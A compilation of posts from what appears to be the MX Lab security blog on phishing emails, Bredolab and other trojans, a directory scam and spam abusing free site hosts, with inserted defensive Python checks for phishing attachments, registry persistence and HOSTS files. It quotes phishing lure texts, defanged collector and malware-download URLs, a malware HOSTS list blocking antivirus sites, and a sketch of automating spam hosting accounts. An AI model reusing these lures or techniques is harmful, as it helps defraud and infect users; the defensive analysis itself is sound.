Original phishing email for Egg bank account owners

MX Lab intercepted an original (well, that’s our opinion) phishing email campaign aimed at Egg bank account owners.

The email was sent from the spoofed email address Egg Bank Plc <notice@new.egg.com> with the subject “Account notification”.

As always, phishing is about getting personal and confidential information from a user. Once this information is obtained, the data can be used for hacking into bank accounts and so on.

This campaign has a nice, attractive eye catcher with the text “Something for the weekend” and “Two nights for the price of one”. It could catch your attention when you receive it, and I can imagine that someone would follow the included link to find out more.

Unfortunately, the text continues with: “To ensure your protection….” and this should be the moment to start thinking that this isn’t such a good offer after all.

New Bredolab variant targets Facebook users

MX Lab intercepts a new Bredolab trojan variant masked as an email from Facebook sent from the spoofed email address The Facebook Team <change@facebook.com>. The subject of the message is “Facebook Password Reset Confirmation! Your Support.” and the body of the email contains the following content:

Dear user of facebook,

Because of the measures taken to provide safety to our clients, your password has been changed.
You can find your new password in attached document.

Thanks,
Your Facebook.

As with the previous virus outbreak that targeted Facebook users, this email contains instructions to open the attached document Facebook_password_357.zip. Once extracted, the 56 kB file Facebook_password_357.exe is available.

The trojan will create the following files on an infected system:

%Temp%\1.tmp
%System%\nnfj.tqo

The following Windows registry key is created:

* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\idid

The following Windows registry value is modified:

* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
    o Shell =

Phishing emails with attached HTML forms instead of embedded URLs

MX Lab noticed an increase in phishing emails that carry an attached HTML form instead of an embedded URL that directs the user to an online form.

Phishing emails with an embedded URL are subject to certain filters, or so-called intent analysis techniques. The email can be blocked successfully when the URL is known as a phishing site.

Phishers try to avoid these techniques by sending an HTML page as an attachment to the email. The instructions in the email tell the receiver how to open the attachment. Once the attached web page is opened in a browser, you get a form asking for some details. The data is submitted to an online web site that handles the request and redirects you further.

Western Union phishing

The phishing email is sent from the spoofed address Western Union customer-support@westernunion.com with the subject “Notice from WesternUnion© : Access to sensitive part of your online account has been suspended(CODE:RX41819S1)”.

The attached file is named restore.account.html and, when opened in a browser, shows a web form that asks for your personal details.

When investigating the HTML code we can see that the CSS, JavaScript and images are requested from the official web site of Western Union. The post action of the web form submits the details to hxxp://elainegohl.biz/restore.php.

PayPal phishing

The message comes from account@ paypall.com – notice the use of a domain with a ‘typo error’ – and this one includes instructions to open the attached file to restore access to the account.

The attached file Restore Account.html contains a form that will send the submitted details to hxxp://pisyneluta.com/u.php.
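The Western Union and PayPal attachments above share one pattern: the page borrows its look (CSS, JavaScript, images) from the real brand site, while the form’s post action points somewhere else. The following check, added here as an example and not code from MX Lab or the original post, extracts every form action and input from an HTML attachment and compares the hosts against the brand’s own domains. The sample attachment, the brand domain bank.example and the collector host collector.invalid are constructed placeholders, not the real files or hosts named above.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field names that suggest credential or payment data is being asked for.
SENSITIVE_NAME_HINTS = ("pass", "pin", "card", "cvv", "ssn", "account")


class FormAuditor(HTMLParser):
    """Collect every form's action and inputs, plus the hosts that CSS/JS/images load from."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.resource_hosts = set()

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "fields": []})
        elif tag == "input" and self.forms:
            self.forms[-1]["fields"].append((a.get("name") or "", (a.get("type") or "text").lower()))
        elif tag in ("script", "link", "img"):
            host = urlparse(a.get("src") or a.get("href") or "").hostname
            if host:
                self.resource_hosts.add(host.lower())


def audit_html_attachment(html, brand_domains):
    """Return human-readable findings; an empty list means nothing suspicious was seen."""
    parser = FormAuditor()
    parser.feed(html)
    brand = tuple(d.lower() for d in brand_domains)

    def is_brand(host):
        return host is not None and any(host == d or host.endswith("." + d) for d in brand)

    findings = []
    for form in parser.forms:
        host = urlparse(form["action"]).hostname
        host = host.lower() if host else None
        sensitive = [n for n, t in form["fields"]
                     if t == "password" or any(h in n.lower() for h in SENSITIVE_NAME_HINTS)]
        if is_brand(host):
            continue  # posts back to the brand itself: nothing to flag here
        target = host or "a relative URL"
        if sensitive:
            findings.append("form collects %s and submits to %s" % (", ".join(sensitive), target))
        else:
            findings.append("form submits to %s" % target)
    borrowed = sorted(h for h in parser.resource_hosts if is_brand(h))
    if findings and borrowed:
        findings.append("page loads CSS/JS/images from %s to look legitimate" % ", ".join(borrowed))
    return findings


# Constructed attachment (not the real restore.account.html); bank.example and
# collector.invalid are placeholder names.
SAMPLE_ATTACHMENT = """<html><head>
<link rel="stylesheet" href="https://www.bank.example/css/site.css">
<script src="https://www.bank.example/js/common.js"></script>
</head><body>
<img src="https://www.bank.example/img/logo.gif">
<form method="post" action="http://collector.invalid/restore.php">
<input name="userid" type="text">
<input name="password" type="password">
<input name="cardnumber" type="text">
<input type="submit" value="Restore access">
</form></body></html>"""

if __name__ == "__main__":
    for line in audit_html_attachment(SAMPLE_ATTACHMENT, ["bank.example"]):
        print(line)
```

Run this over every HTML attachment at the gateway, with the brand list derived from the claimed sender domain. The .mht variant in the PayPal example below is MIME-encoded HTML, so it has to be unpacked (Python’s email package can do that) before the HTML part is fed to this parser.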

Another PayPal phishing example

Dear PayPal customer,

During our regularly scheduled account maintenance and
verification procedure we have detected a slight error in your
billing information.

This might be due to the following reasons:

1. A recent change in your personal information (ie. change of address, email address)
2. An inability to accurately verify your selected option of payment due to an internal error within our systems.

Please verify your information. To do this we have attached a
form to this email. Please download the form and follow the
instructions on your screen.
NOTE: The form needs to be opened in a modern browser which has
javascript enabled (ex: Internet Explorer 7, Firefox 3, Safari 3,
Opera 9)

We are requesting this information to verify and protect your
identity. This is in order to prevent the illegal activity of
PayPal accounts.

Please do not reply to this email.

We apologize for any inconvenience this may have
caused. Sincerely, PayPal Security Team.

PayPal Email ID PP836l Email ID PP836

The HTML included with the PayPal phish rendered incorrectly when opened in a browser. Also, the document was named “Profile Update – PayPal.mth” – notice the .mht type instead of .htm.

Explorer SPAM Detector for Public is malware

MX Lab intercepted a few messages with the subject “Systematic Security Software : Explorer SPAM Detector for Public” sent from the spoofed address Systematic Inc <soft@systematic.com>.

The email offers a software tool called Explorer Spam Detector from Symantec:

Systematic launched a new program SPAM detector Explorer, the program automatically detects if a page is original or not, if you open a mail if the sender is not original is detected. If you are tired of spammers and you are tired as your accounts will be broken, to lose money on paypal or lose auctions, Download this program and all your data, all your accounts will be safe. This program is free, you do not need to buy it, you do not need a license.

Below is an actual screenshot of the email:

The included URLs will take you to a web site where the malware is hosted: hxxp://systematic.armed.us/download/Setup.exe.

The malware is approx. 1,5 MB when downloaded and is named Setup.exe.

Submission to Virus Total shows that only 1 of the 40 AV engines detected the malware: Symantec AV engine version 20091.2.0.41. The name Suspicious.Insight is a detection for files flagged by Symantec’s reputation-based security technology, so this is not the name of the malware.

When executed on a computer, the system gets infected and a new window is created:

The appearance of this window on your system could give you the impression that the software didn’t install correctly. By then, your computer is already infected.

The following files are created:

%AppData%\Microsoft\System\Services\[filename of the sample #1] where %AppData% is a variable that refers to the file system directory that serves as a common repository for application-specific data. A typical path is C:\Documents and Settings\[UserName]\Application Data.

The file %System%\drivers\etc\hosts is modified and the following folders are created:

* %AppData%\Microsoft\System
* %AppData%\Microsoft\System\Services

A Windows registry value is added so that the malware is run each time the computer boots:

* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    o [filename of the sample #1] = “%AppData%\Microsoft\System\Services\[filename of the sample #1]”
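Both samples on this page persist through the registry: the Bredolab variant touches the Winlogon Shell value, and this one adds a Run entry that points into %AppData%. The script below, added here as an example and not MX Lab’s tooling, parses a .reg export (as produced by reg export or regedit) and reports both indicators: a Shell value that is no longer the default explorer.exe, and autorun entries whose target lives in a user-writable data or temp directory. The .reg sample is constructed; the page does not give the actual Shell data, so the value shown is an assumption for illustration.

```python
import re

# Keys the two samples on this page touch: Winlogon (Bredolab) and the Run key (fake spam detector).
WINLOGON_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
AUTORUN_KEYS = (
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
    r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
)
# User-writable locations that a legitimate autorun entry rarely points into.
SUSPICIOUS_PATH_FRAGMENTS = ("\\application data\\", "\\appdata\\", "\\temp\\", "%appdata%", "%temp%")

VALUE_RE = re.compile(r'^"(?P<name>[^"]*)"="(?P<value>.*)"$')


def parse_reg_export(text):
    """Parse the string-value subset of .reg export syntax into {key_lowercase: {name: data}}."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            # .reg escapes backslashes and double quotes inside string values
            data = m.group("value").replace('\\"', '"').replace("\\\\", "\\")
            keys[current][m.group("name")] = data
    return keys


def find_persistence(keys):
    """Return (key, value_name, data, reason) tuples for the two indicators described above."""
    findings = []
    shell = keys.get(WINLOGON_KEY.lower(), {}).get("Shell")
    if shell is not None and shell.strip().lower() != "explorer.exe":
        findings.append((WINLOGON_KEY, "Shell", shell, "Winlogon Shell is not the default explorer.exe"))
    for key in AUTORUN_KEYS:
        for name, data in keys.get(key.lower(), {}).items():
            if any(frag in data.lower() for frag in SUSPICIOUS_PATH_FRAGMENTS):
                findings.append((key, name, data, "autorun entry points into a user-writable data directory"))
    return findings


# Constructed .reg export (not from the page; the Shell data is an assumption).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe,C:\\WINDOWS\\system32\\nnfj.tqo"
"Userinit"="C:\\WINDOWS\\system32\\userinit.exe,"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Setup"="C:\\Documents and Settings\\Alice\\Application Data\\Microsoft\\System\\Services\\Setup.exe"
"VBoxTray"="C:\\WINDOWS\\system32\\VBoxTray.exe"
'''

if __name__ == "__main__":
    for key, name, data, reason in find_persistence(parse_reg_export(SAMPLE_REG)):
        print("%s: %s\\%s = %s" % (reason, key, name, data))
```

On a live system the same checks can be run against winreg instead of a text export; the export form is convenient for triage of images collected from several machines. Expect a few legitimate Run entries from per-user installers to land in %AppData%, so treat hits as leads to verify by hash rather than as verdicts.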

The HOSTS file is updated with the following URL-to-IP mappings:

127.0.0.1 www.virscan.org
127.0.0.1 virscan.org
127.0.0.1 221.207.255.61
127.0.0.1 www.virustotal.com
127.0.0.1 virustotal.com
127.0.0.1 74.53.201.162
127.0.0.1 scanner.novirusthanks.org
127.0.0.1 91.121.223.25
127.0.0.1 www.xxbots.net
127.0.0.1 xxbots.net
127.0.0.1 208.43.26.70
127.0.0.1 www.virusscan.jotti.org
127.0.0.1 virusscan.jotti.org
127.0.0.1 66.36.241.92
127.0.0.1 forums.malwarebytes.org
127.0.0.1 74.63.217.106
127.0.0.1 www.codespace.net
127.0.0.1 codespace.net
127.0.0.1 174.133.4.108

As you can see, after this change you will no longer have access to the web sites listed here. Due to the HOSTS file change, all requests to visit these sites point back to your local computer on 127.0.0.1. This is done to prevent the user from visiting these sites for information or for downloading anti-virus/anti-malware software. If you are infected with this malware, make sure that you repair the HOSTS file.
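The HOSTS change above is a useful indicator on its own: a clean Windows HOSTS file maps nothing but localhost to loopback, so any other name (or IP literal) pointing at 127.0.0.1 or 0.0.0.0 is worth a look, and security vendor names make it a strong infection sign. The following check, added here as an example and not MX Lab’s code, parses a HOSTS file, reports such entries and produces a cleaned copy. The sample file is constructed from the default localhost line plus a few of the entries listed above; the vendor keyword list is an assumption and should be extended to match your environment.

```python
import ipaddress

LOOPBACK_OR_NULL = ("127.0.0.1", "0.0.0.0", "::1")
# The only name a default Windows HOSTS file maps to loopback.
DEFAULT_LOOPBACK_NAMES = {"localhost"}
# Assumed keyword list of security/AV-related sites; extend as needed.
SECURITY_NAME_HINTS = ("virustotal", "virscan", "novirusthanks", "jotti", "malwarebytes",
                       "symantec", "kaspersky", "avast", "sophos", "f-secure", "microsoft")


def parse_hosts(text):
    """Yield (line_number, ip, [names]) for every non-comment, non-empty line."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # strip trailing comments
        if not line:
            continue
        parts = line.split()
        entries.append((lineno, parts[0], parts[1:]))
    return entries


def find_blackholed(text):
    """Return (line_number, ip, name, reason) for every non-local name mapped to loopback/null."""
    findings = []
    for lineno, ip, names in parse_hosts(text):
        if ip not in LOOPBACK_OR_NULL:
            continue
        for name in names:
            if name.lower() in DEFAULT_LOOPBACK_NAMES:
                continue
            reason = "non-local name mapped to loopback"
            try:
                ipaddress.ip_address(name)
                reason = "IP address literal mapped to loopback"
            except ValueError:
                if any(h in name.lower() for h in SECURITY_NAME_HINTS):
                    reason = "security vendor site blackholed"
            findings.append((lineno, ip, name, reason))
    return findings


def remove_blackholed(text):
    """Return the HOSTS content with every flagged line dropped (the cleanup step the text asks for)."""
    bad = {lineno for lineno, _, _, _ in find_blackholed(text)}
    kept = [raw for lineno, raw in enumerate(text.splitlines(), 1) if lineno not in bad]
    return "\n".join(kept) + "\n"


# Constructed sample: default localhost entry plus some of the mappings listed above.
SAMPLE_HOSTS = """# default Windows entry
127.0.0.1       localhost
127.0.0.1 www.virustotal.com
127.0.0.1 virustotal.com
127.0.0.1 74.53.201.162
127.0.0.1 forums.malwarebytes.org
127.0.0.1 virusscan.jotti.org
"""

if __name__ == "__main__":
    for lineno, ip, name, reason in find_blackholed(SAMPLE_HOSTS):
        print("line %d: %s -> %s (%s)" % (lineno, name, ip, reason))
    print(remove_blackholed(SAMPLE_HOSTS))
```

On an infected machine the cleaned copy should be written back to %System%\drivers\etc\hosts with administrative rights; the ability to do so without the file immediately changing again is a quick test that the running sample has actually been removed.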

The possible country of origin for this malware is Russia.

Virus Total permalink and MD5: 97ff431ca077c59d76d147832260b7ef.

Email with subject “scan upon download” contains trojan

MX Lab started to intercept a few emails with the subject “scan upon download” coming from randomly spoofed email addresses.

The trojan is named Suspicious:W32/Malware!Gemini (F-Secure) or Mal/TibsPk-D (Sophos) and is able to create malicious executable files on the infected system.

The body of the email:

Dear Sirs,
We have prepared a contract and added the paragraphs that you wanted to see in it. Our lawyers made alterations on the last page. If you agree with all the provisions we are ready to make the payment on Friday for the first consignment. We are enclosing the file with the prepared contract.

The email has the ZIP archive attached named Contract.zip, a 202 kB large file, and once extracted an executable file named Contract.exe appears.

The following files are created:

%AppData%\av.exe
%AppData%\v7LsGuo3u6bku

A new process is created:

%AppData%\av.exe

Virus Total permalink and MD5: 99b165be9e35f83b811925ccbb9be36d.

Directory scam: Registration of the World Business Directory 2010/2011

MX Lab reported in 2009 about the misleading marketing trick that the World Business Directory uses. Guess what, they are back!

MX Lab received a new registration form from the World Business Directory and again, we want to point out a few things before you sign their contract.

The email comes from info@companyworld2010.com, with the subject “Registration of the World Business Directory 2010/2011″ and this is the email content:

Dear Madam/Sir,

In order to have your company registered in the World Business
Directory for 2010/2011, please print, complete and return the
enclosed form (PDF file) to the following address:

World Business Directory
Suite 149 – Rosden House – 372 Old Street
EC1V 9AU / London – United Kingdom
E-mail: office@companyworld2010.com
Fax: +44 207 806 8157

Updating is free of charge!

To unsubscribe, please send an email to
unsubscribe@companyworld2010.com

Attached is a PDF file named world-businessdirectory.pdf.

The first point that needs your attention is text block 1:

To update your company profile, please print, complete and return
this form (Updating is free of charge). Only sign if you want to
place an insertion.

As you can read, updating is free of charge, but if you want your company to get listed in this directory you will need to sign, and then you have to pay.

What is the price of this directory, you may ask yourself? Well, you have to go to text block 2, in very small print, which includes:

I WILL HAVE AN INSERTION INTO ITS DATA BASE FOR THREE YEARS. THE PRICE PER YEAR IS GBP 980.

And there you have it: this contract will cost your business a total of GBP 2940 over 3 years. After the 3-year subscription you can only stop your contract if you inform them on time:

THE SUBSCRIPTION WILL BE AUTOMATICALLY EXTENDED EVERY YEAR FOR ANOTHER YEAR, UNLESS SPECIFIC WRITTEN NOTICE IS RECEIVED BY THE SERVICE PROVIDER OR THE SUBSCRIBER TWO MONTHS BEFORE THE EXPIRATION OF THE SUBSCRIPTION.

A few arguments from our side that this is a scam:

The from email address contains the domain companyworld2010.com and when trying to see if there is a site online we got the notification “This account has been suspended”. We might see new emails from the World Business Directory appear with other domains.

When getting some WHOIS information on the domain we got the following:

Registrant:
 international group c/o Free Private Reg
 P.O. Box 81024
 Burnaby, BC V5H 4K2
 CA

 Domain name: COMPANYWORLD2010.COM

 Administrative Contact:
    boot, cornelis  companyworld2010.com@freeprivateregistration.com
    P.O. Box 81024
    Burnaby, BC V5H 4K2
    CA
    852-3594-1708
 Technical Contact:
    Hostmaster, Domain  hostmaster@doteasy.com
    Suite 210 - 3602 Gilmore Way
    Burnaby, BC V5G 4W9
    CA
    (604) 434-4307    Fax: (604) 608-6832

 Registrar of Record: In2net Network Inc.
 Record last updated on 05-Mar-2010.
 Record expires on 05-Mar-2011.
 Record created on 05-Mar-2010.

 Domain servers in listed order:
    DNS8.DOTEASY.COM   65.61.199.14
    DNS7.DOTEASY.COM   65.61.198.14

 Domain status: clientTransferProhibited
                clientUpdateProhibited

The registrant information is rather vague and points to a PO Box and the administrative contact has the same address. The domain freeprivateregistration.com in the email address of the administrative contact is just a domain alias from doteasy.com. These details must be fake.

In 2009, the PDF document needed to be returned to an address in The Netherlands, in this 2010/2011 edition it needs to be returned to an address in London, UK.

When visiting their site at http://www.world-businessdirectory.com/ on the ‘About us’ page we found the following text:

The World Business Directory online is product of EU Business Services Ltd, a corporation organized and existing under the laws of Nevis, West Indies.

We also found the UK address on the ‘Contact us’ page.

Our recommendation is: don’t sign the document and don’t do business with this company.

Follow these guidelines if you are a victim of this directory scam:

  • Do not pay, even if they imply to take your case to court.
  • If you have paid a certain amount, stop the next payments. Expect that you won’t get a refund either.
  • Send them a letter informing them you have been misled and telling them to cancel the contract.
  • If possible, report to (local) authorities.

Additional information:

Stop EU Business Services Ltd Trading As World Business Directory
Stop world-businessdirectory.com

On the web site of Richard Corbett you can find some background information about directory scams and what to do when you are a victim of such a scam.

Web site creator hosts are being abused in spam campaigns

Spammers are not afraid to abuse community sites or blog creators like blogspot.com in their spam campaigns. In some cases the content is published on these sites, or a redirect is embedded that forwards the visitor to a web site of their choice offering porn, pills and other stuff.

MX Lab noticed an increase over the last few days in URLs in spam messages that point to (free) web site creator hosts or less well-known blog creators. Some of the latest victims are doodlekit.com, sitekreator.com, webs.com, webstarts.com and blogdrive.com.

Some examples of the spam:

of necromancer beyond power drill ostensibly wily
dissidents customer
PornstarMikaTanAnalFingering hxxp://trhombic.blogdrive.com
because girls

dissidents blotched greedily

mirror about starlet likeable
WorldOfLustyAmatteurGalsFujckkingOnCameraWithBigCodfckedLadsAndBelovedSelxToys hxxp://sitekreator.com/Dewtty/sdfgty.html

haunchestoward

for cleavage inside carelessly womanly
bubble baths scythe
AsianSuckingAndFuckingHardcore hxxp://wilfredorz.webs.com
or tea parties

over and accidentally

tea parties flabby
WorldOfLustyAmatenurGalsFujckkingOnCameraWithBigCobckedLadsAndBelovedSjexToys hxxp://s2.webstarts.com/ssey/q2.html

philosopherssecretly

What we also notice is the use of random words in the spam message again. This is a very common technique, used in the past to avoid detection by Bayesian filters and/or to compromise and corrupt the knowledge database of the Bayesian filter when the message is used to train the filter.

This technique is also present in the latest spam campaign of the Canadian Pharmacy:

This is a link to our shop http://bc.greatsilent.ru/

gazoive dyojefip eicyla uxamo kajoubemi zitykiboto yejy
irewyumuco izaafoe samin uypoi nyqii asydado
hoxyaogeqa eokinap asiwy yziuboaxoj alomem kawuqyxy
ajitikumoa fiaxe oqoce qiahow yvenouwa bosyebuje ucotaley
yeqa uhybyo nidodyziru logu noboma uuju uedywaby
…. (cut)….
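The two effects described above can be shown with a small Graham-style Bayesian filter. The example below is added here and is not MX Lab’s filter: it trains on a constructed ham/spam corpus, scores a spam message with and without the kind of random-word padding shown in the Canadian Pharmacy sample, and exposes the defensive counter-measure, the fraction of never-seen tokens. Because unknown tokens are ignored when scoring, the padding does not lower the spam probability; and because a message with a high unknown-token ratio is refused as training input, the padding cannot be used to pollute the token database. The corpus, test messages and the 0.5 threshold are assumptions for illustration.

```python
import math
import re
from collections import Counter

TOKEN_RE = re.compile(r"[a-z][a-z'\-]+")


def tokenize(text):
    """Presence-based tokens: each word counts once per message."""
    return set(TOKEN_RE.findall(text.lower()))


class BayesFilter:
    def __init__(self):
        self.spam_docs = 0
        self.ham_docs = 0
        self.spam_tokens = Counter()  # number of spam messages containing each token
        self.ham_tokens = Counter()

    def train(self, text, is_spam):
        tokens = tokenize(text)
        if is_spam:
            self.spam_docs += 1
            self.spam_tokens.update(tokens)
        else:
            self.ham_docs += 1
            self.ham_tokens.update(tokens)

    def token_prob(self, token):
        """P(spam | token) with add-one smoothing, or None for a token never seen in training."""
        s, h = self.spam_tokens[token], self.ham_tokens[token]
        if s + h == 0:
            return None
        ps = (s + 1) / (self.spam_docs + 2)
        ph = (h + 1) / (self.ham_docs + 2)
        return ps / (ps + ph)

    def score(self, text):
        """Return (spam probability, fraction of tokens the filter has never seen)."""
        tokens = tokenize(text)
        known = [p for p in (self.token_prob(t) for t in tokens) if p is not None]
        unknown_ratio = 1 - len(known) / len(tokens) if tokens else 0.0
        if not known:
            return 0.5, unknown_ratio
        # Combine per-token probabilities in log space to avoid underflow.
        log_spam = sum(math.log(p) for p in known)
        log_ham = sum(math.log(1 - p) for p in known)
        return 1 / (1 + math.exp(log_ham - log_spam)), unknown_ratio

    def train_guarded(self, text, is_spam, max_unknown_ratio=0.5):
        """Refuse to learn from word-salad messages so the padding cannot poison the token database."""
        _, unknown_ratio = self.score(text)
        if unknown_ratio > max_unknown_ratio:
            return False
        self.train(text, is_spam)
        return True


# Constructed training corpus (not real MX Lab data).
SPAM_CORPUS = [
    "buy cheap pills online from our shop, viagra discount offer",
    "cheap pills discount offer, visit our online shop today",
    "hardcore video link, click here for free pills and casino",
]
HAM_CORPUS = [
    "please find attached the meeting agenda for friday",
    "the contract draft is ready, see the attached document and the agenda",
    "can we move the meeting to thursday? thanks",
]
SPAM_TEST = "visit our shop for cheap pills discount"
# The same spam padded with random words of the kind shown in the Canadian Pharmacy sample.
PADDED_SPAM = SPAM_TEST + " gazoive dyojefip eicyla uxamo kajoubemi zitykiboto yejy irewyumuco izaafoe samin"
HAM_TEST = "see the attached agenda for the meeting"


def build_filter():
    f = BayesFilter()
    for text in SPAM_CORPUS:
        f.train(text, True)
    for text in HAM_CORPUS:
        f.train(text, False)
    return f


if __name__ == "__main__":
    f = build_filter()
    for label, msg in (("spam", SPAM_TEST), ("padded spam", PADDED_SPAM), ("ham", HAM_TEST)):
        prob, unknown = f.score(msg)
        print("%-12s spam=%.3f unknown-ratio=%.2f" % (label, prob, unknown))
    print("padded message accepted for training:", f.train_guarded(PADDED_SPAM, True))
```

The unknown-token ratio is itself a usable feature (a message where most words have never been seen by a filter trained on your mail is unusual), but the threshold has to be tuned per corpus: a legitimate message in a language the filter was never trained on will look like word salad too.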

New web site creator hosts are being used each day. When I visited a few of those web site creator hosts I found that signing up is very easy. Account requests can be automated quite easily, up to a certain point, without being blocked by some kind of security measure or by having to click an activation link in an email.

On doodlekit.com we found a CAPTCHA security on the subscription web form but I believe that a good CAPTCHA should have letters that are less readable than this one. But, this is a start.

On webs.com I set up a dummy web site account with the site address http://tryviagra.webs.com without any security measure at all! This means that anyone can set up a free web site creator account just by completing the web forms.

In this particular case I could even automate every step and let a bot do all the work. I could create 10 to 100 accounts a day and perhaps the site administrators wouldn’t even notice. It is a very efficient way of getting coverage on the internet, getting free hosting for my site or redirecting visitors to my site.

To make it worse, I can also place malware on this site and try to infect each visitor on my site with malware, ransomware or other malicious files.

As a spammer, I have the advantage over intent analysis tools or SURBL, tools that examine and block messages based on the included URLs, by generating multiple URLs each day and changing the URLs in the spam message.

Again, it shows that internet security is a responsibility of everyone and everyone should get involved. If we want to stop spammers, we also have to make sure that some of the features spammers have today – this is a nice example, I think – can’t be used tomorrow.

Feel free to comment on this post.

Disclaimer: it is not our intention to attack webs.com on their lack of security – perhaps in a certain way it is – but to point out how easy it is to abuse certain online tools.